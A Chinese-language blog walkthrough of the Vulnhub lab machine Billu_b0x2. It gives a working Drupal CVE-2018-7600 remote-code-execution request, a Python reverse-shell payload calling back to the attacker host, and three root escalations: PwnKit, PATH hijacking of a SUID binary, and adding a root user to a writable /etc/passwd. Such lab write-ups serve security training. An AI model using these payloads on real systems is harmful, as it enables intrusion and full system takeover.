Vulnhub靶机:Billu_b0x2

最新推荐文章于 2024-06-16 19:43:17 发布
最新推荐文章于 2024-06-16 19:43:17 发布
阅读量368 收藏 8
点赞数 7
分类专栏: 靶场 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_48904485/article/details/136526753
版权

一、介绍

运行环境:Virtualbox

攻击机:kali(10.0.2.4)

靶机:Billu_b0x2(10.0.2.11)

目标:获取靶机root权限和flag

靶机下载地址:https://www.vulnhub.com/entry/billu-b0x-2,238/

二、信息收集

使用nmap主机发现靶机ip:10.0.2.11

在这里插入图片描述

使用nmap端口扫描发现靶机开放端口:22、80、111、8080、41721

nmap -A 10.0.2.11 -p 1-65535

在这里插入图片描述

打开网站,发现该网站是由drupal cms搭建的

在这里插入图片描述

使用droopescan工具扫描判断该drupal 的版本,为8.3.6

droopescan scan -u http://10.0.2.1

在这里插入图片描述

使用searchsploit搜索drupal 8.3.6的历史漏洞,发现存在符合版本的命令执行漏洞

searchsploit drupal 8.3.6

在这里插入图片描述

我们选择php/webapps/44448.py,将该poc导出

searchsploit -m php/webapps/44448.py

在这里插入图片描述

执行该poc,该网站存在命令执行漏洞:CVE-2018-7600

在这里插入图片描述
在这里插入图片描述

三、漏洞利用

我们需要获取靶机的shell,在网上找到一个exp如下:

POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1
Host: 10.0.2.11
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 103

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=id

在这里插入图片描述

修改id命令为反弹shell命令,使用python反弹shell

form_id=user_register_form&_drupal_ajax=1&mail[#post_render][]=exec&mail[#type]=markup&mail[#markup]=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.2.4",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

在这里插入图片描述

获取交互式shell

python -c 'import pty; pty.spawn("/bin/bash")'

在这里插入图片描述

四、提权

方法一:

使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现/usr/lib/policykit-1/polkit-agent-helper-1,该版本的polkit具有本地提权漏洞:CVE-2021-4034

在这里插入图片描述

靶机存在gcc环境,我们可以直接通过web服务器将exp上传到靶机

在这里插入图片描述
在这里插入图片描述

编译执行得到root权限

在这里插入图片描述

方法二:

使用命令find / -perm -u=s -type f 2>/dev/null查看一下具有SUID权限的二进制可执行文件,发现可疑文件/opt/s

在这里插入图片描述

使用命令strings /opt/s查看该文件的字符串信息,发现该文件以root权限执行了scp命令

在这里插入图片描述

我们可以修改环境变量来提权

cd /tmp
echo '/bin/bash' > scp
chmod +x scp
export PATH=/tmp:$PATH
/opt/s

在这里插入图片描述

方法三:

查看passwd的权限发现我们具有修改passwd文件的权限

在这里插入图片描述

passwd 由冒号分割,第一列是用户名,第二列是密码,x 代表密码 hash 被放在 shadow 里面了(非root用户不可读)。

test:x:1000:1000::/home/test:/bin/bash

当我们的passwd文件给普通用户配置了写权限,那么我们就可以通过修改x为一段已知的密码的hash值来进行提权。

利用Perl和crypt来使用salt值为我们的密码生成哈希值

perl -le 'print crypt("123456","addedsalt")'

在这里插入图片描述

然后执行下面这条命令,成功将test用户的信息加入 /etc/passwd 文件

echo "test:adrla7IBSfTZQ:0:0:User_like_root:/root:/bin/bash" >>/etc/passwd

在这里插入图片描述
在这里插入图片描述

用户名:test 密码: 123456 登录主机,登录成功后,是 root 权限

在这里插入图片描述

huang0c
关注
  • 7
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
Billu_b0x2[靶机]
weixin_43736033的博客
03-14 545
主机发现: 端口探测: 开了四个端口 22 80 111 8080 用dirb扫了一下网站 访问install.php 给我跳转到了 搜了一下版本号 8.3.x存在远程执行漏洞 找到匹配时间的exp 设置set RHOST 开始攻击 拿到shell 内核是4.4.0的 提权方法没找出来 在网上搜的payload Find / -perm -u=s -type f 2>/de...
靶机练习之Billu_b0x
10-04
通过该靶场,能够初步了解web渗透的基本流程。小白在了解了web各种漏洞原理,之后,可以练习一下该靶场,靶场做法很多。我也是一个小白,来这里记录一下学习的过程,不喜勿喷!!!感谢!!!
VulnHub实战篇一:Billu_Box靶机渗透记录
a1004070060的博客
03-31 1724
0x00前言 由于2020年疫情原因,被迫宅家已有两个月之久,假期里边摸鱼边学习也浪费了不少时光。感叹光阴似箭的同时,临近毕业也加倍地感受到就业的压力。最近听了某位OSCP大佬的安利,决定开始拿VulnHub练练手。 本系列文章用来记录VulnHunb靶机的渗透过程,欢迎各位师傅讨论学习。 0x01靶机信息 靶机名称:Billu_b0x 下载地址:https://downloa...
Billu_b0x2内网渗透(多种提权方法)靶场-vulnhub
qq_35664104的博客
10-03 1640
本次来试玩一下vulnhub上的Billu_b0x2,下载地址。 下载下来后是 .ova 格式,建议使用vitualbox进行搭建,vmware可能存在兼容性问题。靶场推荐使用NAT(共享)模式,桥接模式可能会造成目标过多不易识别。 IP win7: 192.168.31.44 kali: 192.168.31.17 靶机: 192.168.31.132 信息搜集 主机发现得到靶机ip,接着进行端口扫描 nmap -sV -A -p- 192.168.31.132 开放了22, 80,
billu_b0x2 靶机渗透实战
n5xxxx__zy的博客
07-23 682
目标靶机ip:192.168.146.140, 目的是获得root权限 1.信息收集 开放了四个端口 22 80 111 8080 80端口用Drupal框架搭的站 用dirb扫一下目录 很多目录 进去看看有没有有用的信息 这东西不知道干嘛用的 先留着 目录跑了半天终于跑完了发现了一个页面 去查查Drupal8.3.5有没有可以利用的漏洞 打开神器 search drupal...
渗透靶机测试--billu_b0x2--学习笔记
Sacrifice_li的博客
05-14 909
最近找了几个渗透靶机来玩玩,主要目的是为了获取root权限。这次的靶机名字是billu_b0x2,下载地址 攻击机ip:192.168.6.128 靶机 ip:192.168.6.132 1.打开目标靶机,正常用nmap扫描一下目标靶机的ip, 使用命令 nmap -sP 192.168.6.0/24 可以找到目标靶机的ip地址为192.168.6.132 2.寻找靶机开放端口 使用命令 nmap -p- -A -T4 192...
【学渗透靶机——Billu b0x2
jieli0901227的博客
06-09 183
访问80端口发现这个网站底部有个Powered by Drupal ,判断网站使用 Drupal CMS框架 ,看看能不能找到版本,是否可通过版本作为突破。我们知道在Drupal CMS框架 的安装路径上会显示版本信息,果不其然 ,是存在的Drupal CMS框架 的版本为8.3.5。查看http://192.168.241.157/ 源代码 发现网站使用Drupal CMS框架 的版本8 ,在kali 上 searchsploit 漏洞库搜索一下,Drupal CMS有没有可利用的漏洞。
[ 转]渗透测试实战-billu b0x2靶机入侵
zgy956645239的博客
03-01 812
billu b0x2靶机 老规矩 nmap 开路 通过探测可以看到该靶机一共开放了5个端口,我们还是把目光放在80端口上 访问如图: 看到底下 该网站使用了 “Drupal”框架搭建,前几个月该框架曝光过一个高危漏洞,根据这些靶机的惯用尿性,应该是存在该漏洞的。通过MSF来搜索该漏洞,如图: 发现有漏洞,调用模块输入ip和payload,如图: 成功拿下shell。。。。 如图:...
Vulnhub 渗透练习(二)—— BILLU: B0X
shinygod的博客
02-15 432
最后在靶机上依次执行如下命令,当然这边用 wget 下载,我们攻击机开个 apache 服务就行了,本来可以在攻击机上直接编译好,然后直接传 exp,但是kail 上编译的时候一直报错,就只能到靶机上编译了。通过 test 目录的文件读取 phpmyadmin 的配置信息,获得 root 密码,又因为目标靶机开了 22 端口,所以我们可以直接 ssh 登录。penal.php 最主要的就是俩个功能,一个文件包含,还有一个就是文件上传,且上传的目录也告诉我们了,/uploaded_images。
渗透Billu b0x2靶机
午夜安全
10-31 1155
渗透Billu b0x2靶机 1.nmap扫描与漏洞寻找 使用nmap扫描,扫描结果如下: 发现开放了22、80、111、8080端口,先访问web服务,发现Drupal,寻找其漏洞。 找到后,下载exp,直接按照说明使用,成功连接服务器。 为了方便后续的操作,使用python脚本反弹shell,在kali使用nc命令监听4444端口,python脚本如下,其中192.168...
Vulnhub靶机系列:De-ICE: S1.120
01-09
靶机默认ip是192.168.1.120,最好设一个对应网段的网卡给它,我的这篇文章有简单指导Vulnhub靶机系列:pWnOS: 2.0另外iso文件如何导入就不赘述了,安装完最好重启一下。完成上述步骤后可以netdiscover一下确定。 利用...
Vulnhub靶机系列:Kioptrix: Level 1.2 (#3)
01-09
这次的靶机Vulnhub靶机:Kioptrix: Level 1.2 (#3) 文章目录靶机地址及相关描述靶机设置利用知识及工具信息收集并getshell提权总结 靶机地址及相关描述 https://www.vulnhub.com/entry/kioptrix-level-12-3,24/ ...
vulnhub靶机实战-My-cmsms靶机
09-29
vulnhub靶机实战-My-cmsms靶机 本文档将针对vulnhub靶机实战-My-cmsms靶机,详细讲解靶机的主机发现、端口扫描、服务版本识别等相关技术。 主机发现 在靶机实战中,主机发现是指通过各种技术手段来发现目标网络中...
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
2024中国网络安全产品用户调查报告(发布版)
2301_76786857的博客
06-12 703
本报告正是安在新媒体发起,基于“诸子云社群,以“取之于民,用之于民"的方式,反馈“甲方"眼中的中国网络安全市场情况,为网络安全行业提供来自网络安全企业用户视角的参考。自2020年始,人类进入了21世纪的第二个十年,全球进入了百年未有之大变局,新十年的开始即被新冠疫情逆转了全球化发展的历程,而至2022年3月俄乌战争又突然爆发,紧接着2023年7月“巴以冲突"皱起,世界快速进入动荡中,不确定性激增,网络对抗愈演愈烈,导致中国网络安全市场和环境受到重大影响。
网络安全实战:剖析ThinkPHP 5.1.X反序列化漏洞
weixin_43822401的博客
06-16 417
ThinkPHP作为广泛使用的PHP开发框架,在5.1.X版本中存在一个严重的反序列化漏洞。该漏洞允许攻击者通过构造特定的序列化字符串,实现在服务器上执行任意代码,从而可能导致数据泄露、服务中断等安全事件。
【网络安全的神秘世界】AppScan安装及使用指南
最新发布
weixin_54750312的博客
06-16 227
动态的web扫描,爬取目标网站的接口、链接,通过扫描器自身的扫描逻辑去发送一些特定的http请求数据包,根据服务端的返回内容来判断存在哪些漏洞。AppScan是一种综合型漏洞扫描工具,采用SaaS解决方案,它将所以测试功能整合到一个服务中,避免了因操作系统不同带来的安装问题。ASoC使用安装在应用程序上的代理,通过监控所有的交互流量,在应用程序运行期间识别安全漏洞。checkmark:非编译扫描,代码是什么样它就什么样。fortify:编译扫描,需要一定的环境依赖。动态分析(DAST)——黑盒扫描。
网络安全(补充)
m0_62207482的博客
06-16 509
网络蠕虫是一种具有自我复制和传播能力、可独立自动运行的恶意程序,属于主动传播。属于被动传播的有计算机病毒、特洛伊木马、逻辑炸弹、细菌、恶意脚本、恶意Active X控件、间谍软件等 文件型病毒系计算机病毒德意志,主要通过感染计算机中的可执行文件(.exe)和命令文件(.com)。把所有通过操作系统的文件系统进行感染的病毒都称作文件病毒。可以感染所有标准的DOS可执行文件:包括批处理文件、DOS下的可加载驱动程序(.SYS)文件以及普通的COM/EXE可执行文件。由于HTML文件无法嵌入二进制执行代码,且是
vulnhub靶机系列:
09-09
你好!关于Vulnhub靶机系列,我可以提供一些信息。Vulnhub是一个开放的漏洞测试平台,提供了一系列用于学习和实践渗透测试的虚拟机。这些虚拟机包含了各种不同的漏洞,供安全爱好者和专业人员练习渗透测试技巧。 Vulnhub上有许多靶机系列,每个系列都包含了多个不同难度级别的虚拟机。通过解决这些靶机,你可以学习到渗透测试中常见的攻击技术和漏洞利用方法。 一些著名的Vulnhub靶机系列包括: 1. Kioptrix:这是一个非常受欢迎的系列,包含了多个不同难度级别的靶机。从初级到高级的挑战,覆盖了各种网络安全知识。 2. Metasploitable:这个系列模拟了一个容易受到攻击的系统,用于学习Metasploit框架和漏洞利用。 3. SickOS:这个系列提供了一些有趣的靶机,涵盖了各种不同类型的漏洞。 4. HackTheBox:虽然HackTheBox不是Vulnhub上的系列,但它也是一个非常受欢迎的漏洞测试平台,提供了一系列具有挑战性的靶机。 这些靶机系列都可以帮助你锻炼渗透测试技能,并提供了一个实践环境来深入了解网络安全和漏洞利用的原理。希望这些信息能帮到你!如果你还有其他问题,请随时提问。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huang0c

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值